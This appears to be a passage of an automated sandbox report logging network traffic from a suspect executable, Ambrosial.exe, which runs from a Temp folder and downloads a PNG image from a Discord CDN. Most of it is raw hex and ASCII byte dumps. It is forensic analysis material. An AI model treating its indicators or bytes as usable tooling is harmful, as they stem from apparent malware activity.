                                                                                                                                                                                      2021-10-30 11:52:29 UTC881INData Raw: 99 d7 e8 db 91 b4 2d 9d ef b9 5e 37 4a 29 88 a5 07 a1 ed 33 18 6d f7 f2 59 b9 51 ab 81 67 2a c0 45 9a 08 c4 c3 46 2a 15 04 fd 58 3f fa 54 5e b4 b1 54 b1 9a f8 1c 38 c0 ff be 9e 2e a1 88 a0 cf 42 f8 bd 9a cb 8b 24 ad d6 c0 ea 6d 32 4e ac f6 cb 24 99 49 90 d1 b0 fb e8 2e 92 60 87 b1 79 1d 0e 9c 83 a5 d6 71 29 48 a4 3f ea 5e c4 26 0d 0e 4d 2f 68 2d 88 e5 2f 16 38 24 62 e4 74 a2 73 85 81 81 06 7a dd 0a 4a 2a a9 9c d1 6f 39 13 43 0e 6d 5c c3 9c c6 a7 db 8b dc 6d 47 fb a5 5d d3 e1 80 f7 40 86 d5 a6 d2 16 9c 5d fa 07 3a 4a 2d 5e 97 d9 bf 51 83 b3 0c d3 52 49 84 67 01 b0 e2 d2 97 6c c2 58 d7 a5 88 fb 7e 59 64 cc 4b b8 54 88 55 b2 ee a1 fa 0c 36 5d c3 74 4a 6a ad 76 02 9b cf c9 78 e1 71 5a a2 fb 0e b3 68 89 ae 37 69 aa b9 a0 71 92 23 f8 aa 12 a1 10 1d 70 bc 95 cf
                                                                                                                                                                                      Data Ascii: -^7J)3mYQg*EF*X?T^T8.B$m2N$I.`yq)H?^&M/h-/8$btszJ*o9Cm\mG]@]:J-^QRIglX~YdKTU6]tJjvxqZh7iq#p
                                                                                                                                                                                      2021-10-30 11:52:29 UTC883INData Raw: 6a 80 db f2 a5 ce 05 3b c6 31 a6 85 c0 1c 2f c2 97 92 0d 54 a1 86 94 ae 60 53 96 cc 74 ac 73 6a 93 2e 58 75 d8 d6 25 c3 75 2c 41 cc 4d 94 f0 c9 98 f7 a3 a0 2e 04 d1 3e 2d ac 24 3e 42 db 68 d4 7c 9e ea e6 d3 46 63 0e bf 68 06 06 06 c6 8a 7e 69 35 bd d4 e2 cf 25 6f a5 34 d5 9b ce 58 f7 1d e9 cb dd 97 f0 be ea cb 50 f8 b2 49 97 f9 32 c6 a5 16 3c f0 bd 9b cc 9a 6e d9 33 7e a3 16 17 12 9f 9d 05 c5 e4 a2 cb e9 08 da fe 69 19 09 cf 16 e7 c5 b8 28 11 9f 8b a5 16 cc a1 18 23 eb 21 9c 2b d1 75 6a 88 78 5b 6a 17 b0 2d 4b 66 33 d6 f9 e6 44 c3 be 5a 09 4a 95 2f ae 6e e5 f4 6a cc f7 42 9b 20 95 c3 70 9b ec 93 a5 d6 a5 30 d1 27 9c b9 1c 0f 29 32 2e c9 f9 8b d1 8b 1e 18 b9 cd 81 59 8e b1 68 9a e8 98 de 39 7f 06 53 7e aa f9 57 e5 4c 9e 2e 3e 2b 79 76 d2 d7 a4 f3 3d d4 8c
                                                                                                                                                                                      Data Ascii: j;1/T`Stsj.Xu%u,AM.>-$>Bh|Fch~i5%o4XPI2<n3~i(#!+ujx[j-Kf3DZJ/njB p0')2.Yh9S~WL.>+yv=


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      13192.168.2.349803162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:41 UTC883OUTGET /attachments/489891892142669842/835895405849739344/auroraback.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:41 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:41 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 62018
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a647058ebed7040-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 94699
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "b4f8cbff5719dd953da41ca97e02cef3"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:41 GMT
                                                                                                                                                                                      Last-Modified: Sun, 25 Apr 2021 15:09:54 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1619363394968599
                                                                                                                                                                                      x-goog-hash: crc32c=eoAexg==
                                                                                                                                                                                      x-goog-hash: md5=tPjL/1cZ3ZU9pBypfgLO8w==
                                                                                                                                                                                      x-goog-metageneration: 2
                                                                                                                                                                                      x-goog-storage-class: NEARLINE
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 62018
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdvHeIllLSWeu44KNaSODPejnv6v0cJ7xbH-OhCsfHJ4C4aF2GdkjfIrpycOh3PfuZEn3Q0CllHzRMqkV5fGMIAUIrDDfw
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HdGWp2gWOJnmaVvwkySI4%2Fh8jxytvi8B6cREF%2FhaVWNWbtoObfBtsRioz1D0g4YjkIJ2KZOudeoMQ6T8HsuqhtlgGqr6xs03kRhiv25Bah%2BcG73EERS8vy71EMVtNNm5FdE7bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:41 UTC885INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:41 UTC885INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 f1 d7 49 44 41 54 78 5e ec bd 07 a0 75 57 55 27 7e be 92 de 48 42 42 42 08 49 08 9d 90 50 13 3a 84 2e d2 3b c2 88 62 61 14 bb 83 8a 6d 70 1c eb d8 db 58 c7 bf a2 48 13 50 ca 20 c2 28 0a d2 94 de 7b 87 00 21 a4 7f e9 ff f5 fb ad b5 f6 5e 7b 9f 7d da bd f7 bd ef fb 82 bf f3 d6 59 75 af 5d 4e b9 eb 9d fb de bd 3b ee fd 80 ef b8 6e c7 8e 1d 9d e2 3a e3 82 20 02 aa 56 c6 d9 18 6b d7 f7 cd ef a5 11 b9 ea 10 13 72 82 c9 54 cd 80 39 03 b0 18 61 65 f4 9c b6 5b 85 d0 f7 2a c3 60 9b 99 0d fd 74 5b 8a 81 f4 d7 d5 8e
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^uWU'~HBBBIP:.;bampXHP ({!^{}Yu]N;n: VkrT9ae[*`t[
                                                                                                                                                                                      2021-10-30 11:52:41 UTC886INData Raw: 83 ae da 48 03 5f 56 a7 fd 0e cb 07 df 8c 5c 96 62 66 a8 27 8d 14 51 eb 06 ab d4 b6 f3 9c 6e 8d 6e 18 73 22 1b 19 dd 54 53 44 b0 cf 2c d4 04 33 8b 9e 4d 14 6b ea c5 de 69 0d f0 3d 09 f0 40 8e 5a 1f 44 0e 9a 15 de c2 e8 fa 05 df ca 1d 38 90 00 47 41 79 49 25 7a 96 8d 5e 0d fd fe da b6 65 18 fe 98 37 38 d6 cf 3f 1f fd fe 36 db fb 76 ce 65 d3 f0 f3 6f 21 fa 4b ba 51 ac 38 aa bd 87 2d 5e 8f eb 0d 16 ae d1 7e 76 16 cc 80 9e d9 7e ba e8 ec e6 cf 71 6e e4 58 5c ee 77 09 26 5a c5 d7 a3 ed ac d4 0c 69 74 93 13 f3 c8 21 aa d0 30 d5 a8 33 cc 2f d4 00 6f 35 81 79 17 c2 9c 18 87 77 1c 69 0d ac 94 22 37 58 b9 f7 81 62 4d ad c1 b7 72 07 8a e1 e6 f0 38 ad 83 b9 ed 63 dc ba 7d 06 8c a6 82 b3 1d e0 9e 21 5a 0d da 7a de 39 9f 51 dc 77 06 9b ae 37 b2 bd 85 3c e2 15 c7 6f cd
                                                                                                                                                                                      Data Ascii: H_V\bf'Qnns"TSD,3Mki=@ZD8GAyI%z^e78?6veo!KQ8-^~v~qnX\w&Zit!03/o5ywi"7XbMr8c}!Zz9Qw7<o
                                                                                                                                                                                      2021-10-30 11:52:41 UTC888INData Raw: b5 7a 47 e3 48 b3 b0 b8 c1 04 42 9e 59 29 97 f7 ab a3 cd 9b 5b 56 c9 35 8e 19 79 d7 ee b2 cc bf 76 ba b9 d8 e2 8e 7c 56 c3 b4 e0 d8 8d b8 e6 a1 ee 67 ed 84 fb 0e f6 f6 b4 36 dd ff 44 3e 35 35 1c db 80 81 21 35 b1 77 46 b8 ef c2 3e 9e a3 82 af 28 9d e3 4b 36 ea e5 8b f6 78 fb 12 f9 f6 33 8e e1 88 f9 bd 2d 19 d7 0c 0c a5 a3 7d 41 5f 29 7e 41 1b 20 85 cf 6b bb 5a 4d 3a 73 4c 7b b9 58 db 18 7c 29 6b 1a c4 a2 e0 11 84 b6 b3 d2 ac da cf 76 62 d6 44 d6 c0 fe b0 06 0d f8 b2 18 e9 53 cd be 7d 1e 46 82 67 e7 98 8b 45 03 5b 11 de c7 56 f7 13 10 bb 5c b7 db 3a 57 8b 6a b4 62 40 8e 96 2f 52 8d 96 8d 18 74 6c 39 c6 86 0b ec bd 91 ed bb e0 13 b5 b8 70 91 08 2a b2 23 99 5e c1 cd 0d 97 61 3a a2 c4 7a c5 da 92 7e 12 d6 79 9a 36 d5 1d fd 73 e6 64 48 81 10 66 b7 aa c2 c7 db
                                                                                                                                                                                      Data Ascii: zGHBY)[V5yv|Vg6D>55!5wF>(K6x3-}A_)~A kZM:sL{X|)kvbDS}FgE[V\:Wjb@/Rtl9p*#^a:z~y6sdHf
                                                                                                                                                                                      2021-10-30 11:52:41 UTC889INData Raw: 11 d6 4f 33 6e c0 bc 31 a4 dc 79 bd c6 b1 81 c1 f0 80 80 ab ba 39 cc 49 58 c6 f0 b4 98 49 60 8b 51 34 52 65 a5 3c 9b c0 60 c7 73 8f 3d 30 23 6a 32 d9 bc 9e ae 37 f0 f5 68 4e 7b 7f 5e 8b 6a 52 4b a6 b2 1d d3 6e f4 51 8d 78 1c 16 3c 3b 7e 65 f8 a8 b6 be a7 bd 8e a5 53 1c 89 9f b5 6a 74 8e 46 4c 60 2b da c2 ee be 25 f9 d7 19 cb 72 48 a1 a6 45 d7 ee 40 d0 77 ed 94 e2 2b c9 81 10 ef 24 ba fc 68 b1 46 19 76 14 6c b1 68 d3 29 41 96 9f b4 2c 2c d6 20 98 1e 81 97 aa da 46 d0 38 e0 23 e6 7a 86 e3 08 b8 49 b2 8b 83 de 0e a4 7e 54 18 ec b6 8a 5b 0f b6 e2 48 35 44 2b 61 4e c3 32 a6 d5 65 b4 d5 be c5 58 ab f1 86 31 38 19 35 ba 7b 88 14 a5 36 88 99 61 d7 6b cc 9a ff fe be 48 61 fc 83 c7 bc 34 52 1b 8c 2d 31 33 ac 44 d5 60 a5 1c 0e 69 b8 52 db 95 3a 5d a9 d1 fe 05 9f e2
                                                                                                                                                                                      Data Ascii: O3n1y9IXI`Q4Re<`s=0#j27hN{^jRKnQx<;~eSjtFL`+%rHE@w+$hFvlh)A,, F8#zI~T[H5D+aN2eX185{6akHa4R-13D`iR:]
                                                                                                                                                                                      2021-10-30 11:52:41 UTC890INData Raw: e4 d5 39 be 40 5f 87 cd 0c 60 d7 89 e2 fc 5a 11 ae 35 ff b5 ae c3 0f 59 62 a2 ad 94 35 6f 8e cf 3a b8 ea da 87 72 d9 d1 e3 b2 fa b9 d7 9f 84 28 27 ad 8a c9 68 5b 15 63 be ed 82 ce b9 07 33 0e 78 07 20 b1 0b a7 b4 28 bc 17 bc b0 b3 84 55 db 01 eb b4 15 58 73 65 f3 72 6d e2 62 9c 85 62 38 eb cc b3 6c 3b 9c c9 3c eb 74 25 88 eb b3 66 aa 8d a0 38 5e a6 28 cb 1e 4a 21 30 88 93 e0 1c 6d 57 cc 57 94 65 d7 ab a3 6a b3 4a 8a 1e a6 73 ba 69 de dc e7 0e 6a c9 4a 0e 61 ba af b9 a3 59 19 eb 74 30 b4 04 a3 39 37 31 a3 4d ac fd 12 8c 8f 79 d0 3b e4 d8 ae e1 7b ff 2b f6 b7 63 13 87 6a 00 3b 7e ea db 7e fc 3a f9 a5 90 28 0b 21 70 d9 dc 26 02 0a 30 16 50 62 43 91 96 8b ad 2c 67 ae f1 49 ae fd 9e d3 73 04 dd fb 75 9b 72 d9 d1 e3 b2 fa 69 33 dd 91 d5 22 90 e8 f9 c6 30 b4 f2
                                                                                                                                                                                      Data Ascii: 9@_`Z5Yb5o:r('h[c3x (UXsermbb8l;<t%f8^(J!0mWWejJsijJaYt0971My;{+cj;~~:(!p&0PbC,gIsuri3"0
                                                                                                                                                                                      2021-10-30 11:52:41 UTC892INData Raw: 0b c3 57 68 b0 1e 52 77 ab f6 db 6f 37 95 69 a5 6b a4 97 74 79 bf 11 1c 83 ed 7c 3c 28 aa 94 ab 35 15 5c e4 4a fe b1 3f 5e 94 29 df 69 1f 0f e4 71 65 8c e6 14 99 42 da 09 64 c4 fa 23 3b bd d3 f0 fe 43 9b dc 9b e4 e6 a4 f7 aa c0 c5 56 e8 d7 5d 6b dc db 1a 59 2e 38 20 13 d0 c1 b8 9f 40 11 34 ab 45 42 b3 97 a0 fa ec 37 86 a1 84 cb 86 bd 02 5a 1d 4c cd ae df 66 cb 87 09 6c 4b 27 9b c6 7e 39 e8 6d c2 c0 79 d6 5c 32 35 ee f8 8b 1f fe 79 91 f0 b9 39 30 e1 46 a1 3c 17 45 42 e2 23 17 42 81 16 8b b5 24 1b 57 b2 b6 d6 4e 7e 1a 85 1f f4 90 37 c8 4a b9 28 84 ec 76 f9 91 5c d9 06 5d 7e 54 66 1f b2 63 0f 2a ab a4 31 26 0a 92 10 d0 b2 2d c1 74 fb c5 3d 48 83 b2 cd 88 96 94 6c 2d a3 57 04 93 68 a6 55 f2 35 4f 49 3d 48 fd 7c b3 5e 05 86 47 d1 fa 27 dd 76 f4 70 8e b5 90 d2
                                                                                                                                                                                      Data Ascii: WhRwo7ikty|<(5\J?^)iqeBd#;CV]kY.8 @4EB7ZLflK'~9my\25y90F<EB#B$WN~7J(v\]~Tfc*1&-t=Hl-WhU5OI=H|^G'vp
                                                                                                                                                                                      2021-10-30 11:52:41 UTC893INData Raw: 25 97 fe b0 c3 10 12 e7 9e f2 6c f4 c2 a7 da 07 ff c2 ae 88 b0 74 fb 0c 30 0f 1f d7 2a 73 4a d0 c6 53 29 5a 4b b0 56 b7 13 98 bb e4 cd 31 6c e5 c0 fe 13 8b b0 e3 15 cf f9 55 5e e3 24 91 78 93 11 45 b9 17 41 ca 79 a3 91 9b 86 17 6b bc c1 c0 6f 3a da c9 6d 84 79 34 5f 79 ac 7b 32 fd d6 0e ed c5 c4 be c4 a0 7d ea 13 b4 ac ab 4c 4e b9 fd f7 6c 31 97 fc b0 0f e5 2a 53 70 b9 81 f2 e4 d6 98 45 f7 98 dc 45 13 63 3e 85 46 0c c6 a5 fc 65 44 2b 7e 30 07 91 12 15 18 6f 53 a3 9d 63 1e 56 6e d8 c0 40 ae 91 2e 56 eb 7d 93 63 ae c0 d4 5b 98 7f 69 ee b5 86 b2 fe 3c fc 9a f3 27 59 5e 9c a1 64 8a 45 14 c9 8a ab d6 53 b3 28 ef 76 99 fa ae 6e b7 d9 bd 8d 16 6a 5a a4 79 ce d4 2f 76 18 87 8d cc ef 1f c5 3d 46 76 bc 1f a1 c8 12 ce 62 cb 8b 32 a1 ab 4d 26 bf e6 1a 2b d2 84 9b ce
                                                                                                                                                                                      Data Ascii: %lt0*sJS)ZKV1lU^$xEAyko:my4_y{2}LNl1*SpEEc>FeD+~0oScVn@.V}c[i<'Y^dES(vnjZy/v=Fvb2M&+
                                                                                                                                                                                      2021-10-30 11:52:41 UTC894INData Raw: 3d c9 8b aa 54 ac 59 e1 95 8b 35 29 d0 ac 38 83 cc 42 cd 8b 35 14 70 16 07 8a 4f d7 40 ab 17 6b c0 88 33 b9 46 13 ec b3 c0 d1 68 8d 3c 1f a5 36 9a b3 a5 71 2b d7 c1 73 fb e8 86 fa 0a e7 98 71 c7 d4 bc 96 63 73 f3 5d 27 d3 9c 79 a5 fc 6b 74 b4 74 fd 36 b7 3a f3 b0 eb 5b ee fd a0 e7 a2 53 5c dc e4 d8 ec 62 07 c9 7d c0 9e b4 81 ab dd 9f bc 89 98 74 28 d0 6b 60 01 70 53 e3 6d 4e f8 4e e1 72 1f 2c 6e be 99 23 56 fd 7a 93 f4 b6 99 63 47 0e 24 41 51 f7 5f 7e 22 9a c9 48 44 66 9c 7b 47 b6 45 7b 2d f7 09 9b c9 b2 b3 d4 09 c9 47 2d 23 da 23 d5 a0 5d 76 be 26 8e 18 1f 65 48 3a 22 8a 24 b6 cb 01 3d b8 7b 30 84 03 00 37 35 50 89 be 65 20 70 1b 30 d2 e9 8c 31 cd 1f f6 bc a8 4d c2 cf f5 ed eb b9 ea 69 46 c7 08 99 35 3e 0b 64 2c cf f1 4c f1 fe 80 62 8a 4f d1 50 70 59 a1
                                                                                                                                                                                      Data Ascii: =TY5)8B5pO@k3Fh<6q+sqcs]'yktt6:[S\b}t(k`pSmNNr,n#VzcG$AQ_~"HDf{GE{-G-##]v&eH:"$={075Pe p01MiF5>d,LbOPpY
                                                                                                                                                                                      2021-10-30 11:52:41 UTC896INData Raw: 1d d5 35 b1 24 89 77 3a 40 e9 40 1a 55 80 c5 a9 8d 61 cf 32 8c e7 99 1e c7 de c5 d4 b8 74 ec 1a c5 a5 c6 26 3c dd 1b 40 56 d0 e0 69 94 17 53 2c d2 c2 5b 9f f9 89 9a 90 15 6b f5 93 35 2f ca 6a 62 71 96 c8 fa b3 be bd 60 52 c2 18 4d b6 71 42 2e c6 9a c8 8a 34 e6 32 ce 5c 59 66 5c e0 9e 1b ed 84 65 1d 9c fd 19 97 8d 01 0d e8 fd cd ee 72 e9 d6 e7 56 b6 14 08 47 0a 4a 0a 97 5d 8f 52 0f c9 e5 f9 36 85 72 04 eb 62 3a 93 f7 27 c4 f5 8c d4 46 e9 19 8e fb 4f 6c 0f a6 8e 14 f6 29 26 04 bb 3d 98 2a 0c 7b 88 d8 98 17 53 19 3f da da db 3a 25 04 63 10 49 01 bb 1e 73 b7 73 9f 9b 8b 32 2b c0 12 77 bb cb 91 e4 26 e0 24 89 40 8e d4 97 4c 04 73 41 51 c6 9b a1 28 24 f1 a9 9c 6f ce bc 39 49 9c b7 e1 ed 40 7f 08 cd 6f 7b 31 6a 9f b9 d7 a8 bb d5 c7 46 99 7b cf 96 81 be c8 b9 69
                                                                                                                                                                                      Data Ascii: 5$w:@@Ua2t&<@ViS,[k5/jbq`RMqB.42\Yf\erVGJ]R6rb:'FOl)&=*{S?:%cIss2+w&$@LsAQ($o9I@o{1jF{i
                                                                                                                                                                                      2021-10-30 11:52:41 UTC897INData Raw: 6f f1 f8 36 99 76 27 0b 33 16 68 42 72 43 62 81 96 8a 34 2b d0 84 e7 a7 69 b9 48 f3 27 58 35 30 c0 b2 80 d2 a2 29 c9 e2 00 15 c5 9a b4 4a 85 99 b5 f7 82 2c 16 71 f1 a6 9a 0b 36 e5 b4 c3 8f 2d c5 69 6c a9 23 2e 73 48 c6 02 d4 56 98 16 a0 77 33 59 35 51 0f 55 a2 55 f2 86 36 73 9a 23 a6 88 1b 68 a4 71 53 19 a7 fc 2d 68 66 17 c7 33 ac 92 7f 03 b0 21 1a ab 48 b7 b5 c0 13 b5 26 43 6d aa f5 02 4d e3 46 51 de 13 ea fe 64 25 c4 84 eb d1 af 67 3e e1 b2 22 0d c5 8b 17 5a fe 24 8d 85 59 28 48 f0 21 b5 49 4e 84 02 c5 78 c8 01 f2 e2 2f 17 82 da b7 f6 cf 11 71 5c fc 81 58 21 cd 07 f7 3b 51 40 30 52 c6 66 f7 41 b5 d3 92 36 fc d8 2e e5 47 7f 3e 7f de f3 38 57 1d 33 0b 4e 2f d6 9c a4 40 63 d1 16 0a 36 b5 49 b1 66 05 9b af 43 5d 94 7a 41 ca ce 49 b6 57 71 35 34 db 7a fe 75
                                                                                                                                                                                      Data Ascii: o6v'3hBrCb4+iH'X50)J,q6-il#.sHVw3Y5QUU6s#hqS-hf3!H&CmMFQd%g>"Z$Y(H!INx/q\X!;Q@0RfA6.G>8W3N/@c6IfC]zAIWq54zu
                                                                                                                                                                                      2021-10-30 11:52:41 UTC898INData Raw: 9c 43 80 d3 a9 50 86 a8 81 09 77 c2 94 7f 45 f8 61 5a 86 c6 60 f4 d0 af 0e 1e 40 a3 fd 11 36 f7 65 4b 80 b9 56 f3 75 53 22 d9 45 7d 5f 47 1a 6b 18 f4 c8 1c 76 fa 53 33 2f c8 f8 f1 1c e2 c0 42 4a bd 96 8a 33 72 b3 3b 34 1f 36 e1 d2 89 fe 56 98 09 45 18 6e 3c ca 4d 97 e8 fc b7 69 12 27 7a 26 b4 33 3b 7d e6 17 59 cc 22 69 5f ae 6b d1 e6 dc c6 11 65 d9 81 eb ce 7c b0 99 3d e9 70 52 76 69 26 46 e2 eb 13 b1 5c bb e9 7e ea b5 ae 21 87 63 10 d1 65 bf b3 cf 86 46 63 3f 44 11 be d2 e3 d0 65 9a 8e 5b 8a 7c c4 a7 b0 f9 be 37 06 19 da fc 79 6c 08 ec 6a ba bf a1 88 d9 23 b5 7e f4 1a 03 57 ca 85 54 2e b4 9c 72 31 e6 05 87 ea fc 5e 4e 91 b5 98 0b 6d 90 47 6e 08 39 67 c9 e5 c7 fa 16 4e a2 96 e5 99 94 a7 23 7a d6 0a f0 9a b5 fb 25 ae 4f dc 31 5d f7 fb 68 4d 6c 25 3f c8 86
                                                                                                                                                                                      Data Ascii: CPwEaZ`@6eKVuS"E}_GkvS3/BJ3r;46VEn<Mi'z&3;}Y"i_ke|=pRvi&F\~!ceFc?De[|7ylj#~WT.r1^NmGn9gN#z%O1]hMl%?
                                                                                                                                                                                      2021-10-30 11:52:41 UTC900INData Raw: f3 b2 3f 76 c9 9d f2 24 a2 7f 28 36 16 6e 30 6b 00 b8 12 d5 14 1f ed 91 64 cf f6 44 12 4a e8 d3 32 45 ba 66 59 9c 89 84 1f 93 9d 64 e7 51 04 fb 95 cd e7 ea f3 e7 fa 70 ad 50 98 59 81 e6 3a 09 7e ac a1 af 97 90 e5 00 8f f3 e2 d8 c1 a7 30 18 c2 04 2a f6 30 23 ef 3e 80 bc e2 0d c8 14 fa fe b1 39 97 48 91 a3 9d 6c 35 66 8e d7 c3 48 b2 4b 54 fb 06 a8 09 71 a0 38 2b 4f ed 8c d8 de 69 5b 21 1d c6 79 12 10 9c 56 05 f2 05 5a 2b 97 02 35 4e 31 b4 9c 1f b7 89 60 17 62 71 25 76 34 82 1c 8b 34 e7 99 aa 62 cd db 4b 26 95 d1 06 7a b6 0b 1b 24 8f 2b ec b2 a3 cd b8 fb 11 0b 4e 82 dd 78 b2 71 33 19 3b 93 23 57 68 1c 51 3a 88 31 df ba f0 7b b7 9f e3 ad f3 7c cc 3e 84 f8 61 2a 4d 54 e6 55 a6 a6 6d 86 f3 c3 b3 2c af b7 58 da 52 63 79 ec 9b 24 c7 37 e8 e3 98 0c d8 2c ac 3b b0
                                                                                                                                                                                      Data Ascii: ?v$(6n0kdDJ2EfYdQpPY:~0*0#>9Hl5fHKTq8+Oi[!yVZ+5N1`bq%v44bK&z$+Nxq3;#WhQ:1{|>a*MTUm,XRcy$7,;
                                                                                                                                                                                      2021-10-30 11:52:41 UTC901INData Raw: 55 46 fb 38 90 3c 75 20 90 fe d8 27 f6 a2 71 2c ce a3 2d 90 36 2b c9 90 c6 01 5e 14 6b 28 de 7c 78 1e 81 dc 20 59 0f 49 a2 eb 28 eb 23 3c af 99 af 29 78 f6 83 d2 fa a5 3c 96 33 ed a6 30 10 34 ab ed 34 f2 2c b7 12 18 6c 39 e0 c5 c3 ef a5 98 c8 b0 b8 83 31 c4 ce 5d ce 36 f7 00 7d ef 5e c2 5e ed 7c 1a 38 ef 9c f6 55 ec 64 91 25 55 8c 17 5b 5e 70 25 2e 17 b7 cb b8 09 30 06 5c 28 c7 c9 0d c2 fc e4 42 7e 73 50 42 51 95 8b 26 3f 71 22 15 37 a3 40 40 e4 d2 bc e0 c8 99 8a 31 31 a8 2e 32 38 74 b3 21 3e fb 2d 87 d9 53 4e ea d8 ab ec dc 4c 22 bb d5 fc b2 73 0b b8 da 72 94 73 40 7d 14 0b 7b 13 16 30 7c e2 ac fe d9 3e 8b 50 0c 14 4a 8b 14 a5 16 d0 70 60 85 e2 5a ae 8d d0 87 8b e3 f9 57 f3 31 af 26 df 00 36 92 64 11 fc dc 5e 07 3e fd 48 3d 84 6b c8 8f 34 4c bc f6 41 72
                                                                                                                                                                                      Data Ascii: UF8<u 'q,-6+^k(|x YI(#<)x<3044,l91]6}^^|8Ud%U[^p%.0\(B~sPBQ&?q"7@@11.28t!>-SNL"srs@}{0|>PJp`ZW1&6d^>H=k4LAr
                                                                                                                                                                                      2021-10-30 11:52:41 UTC902INData Raw: 1f fa 04 4d a9 f6 bb 0e ee 07 98 b2 ec bc e0 d2 bc e8 17 2f 08 6a 2f b8 53 d2 7d 7c 59 66 2e d8 64 07 3b 89 ba 08 ae 83 e0 37 63 b6 19 45 9b 10 76 b9 bd 5a 75 a3 98 7c 40 10 05 70 9a b8 a5 40 27 79 4c b3 ba 1c 0d ec 3b 3c bc e7 89 8e 26 b9 50 a2 6d 1d 82 cc 4b 82 db a9 e6 64 f1 86 cd 04 f3 11 9a b6 33 b9 b5 45 43 98 f2 cf 00 53 c8 2e 2d d0 8a a4 3f 06 95 34 2d d6 3f 93 17 11 b9 28 03 47 51 03 39 e8 21 b6 ce 91 88 9d 7a af b9 f7 04 b9 9d 48 9d 43 a2 ac 4c 6d dc cc 40 24 c1 80 3e f2 f8 e3 78 bc 08 cb 6f d7 66 1e 7d 49 47 0e 99 1b df 32 25 17 b2 8d 9d 08 38 2e 52 90 ac 50 c3 80 39 07 d8 c9 15 68 69 59 6c 8c 79 bc 4a 9a 1e b2 0a 0c 24 2b 10 0c 3d df 28 86 a3 d1 dd c2 64 9b 81 f7 db a0 b9 63 1a 0e 6b 58 67 e4 cb 19 6b 9a c2 40 cc dc e6 53 f0 3c 69 61 9c 6a 4c
                                                                                                                                                                                      Data Ascii: M/j/S}|Yf.d;7cEvZu|@p@'yL;<&PmKd3ECS.-?4-?(GQ9!zHCLm@$>xof}IG2%8.RP9hiYlyJ$+=(dckXgk@S<iajL
                                                                                                                                                                                      2021-10-30 11:52:41 UTC904INData Raw: a5 00 11 f0 23 6b da 22 bd ee 4a d9 75 16 6d 28 de 40 94 1b 84 1e 8c 2b b2 64 25 50 42 2e 72 20 38 98 41 b7 38 4e e9 2f bd 6d 69 05 17 8b 33 e7 f8 12 74 c8 fe 65 e8 c2 fd 09 9b c7 14 24 39 c1 3d 3f 3a d3 9e 03 58 94 81 09 1f 20 d9 49 8c 4f a0 98 88 e5 1a da 83 6b 9f 4d b4 1c 83 c1 63 68 34 1a c9 03 97 13 41 45 76 4e 45 44 24 85 ce 29 6f fd b8 48 03 98 70 f7 31 96 4b 7c 69 dc 7d 64 ab c7 54 b1 0d d3 3e 85 4d 8d 6b 5f 9f 67 c0 e4 10 d3 5c 64 d7 3c 67 97 c3 3e 47 2d 14 62 20 14 5e 41 f7 42 2c d9 85 b4 48 d3 a2 ad 5d a0 a9 ac a4 e3 d5 1b a8 ea 28 8a d4 86 a1 c7 4d a7 42 b2 78 87 4b 43 1c 02 e4 82 a2 0d b2 ec 7c 3c 3e 36 2f d0 68 4b 71 42 d8 c8 1b 76 f7 99 3f d1 2c 1b da aa 11 3a 90 38 cc e0 aa 29 87 4d 0d 44 10 05 d0 94 b2 34 8e 7e 4c 6e d9 de 62 44 45 be e3
                                                                                                                                                                                      Data Ascii: #k"Jum(@+d%PB.r 8A8N/mi3te$9=?:X IOkMch4AEvNED$)oHp1K|i}dT>Mk_g\d<g>G-b ^AB,H](MBxKC|<>6/hKqBv?,:8)MD4~LnbDE
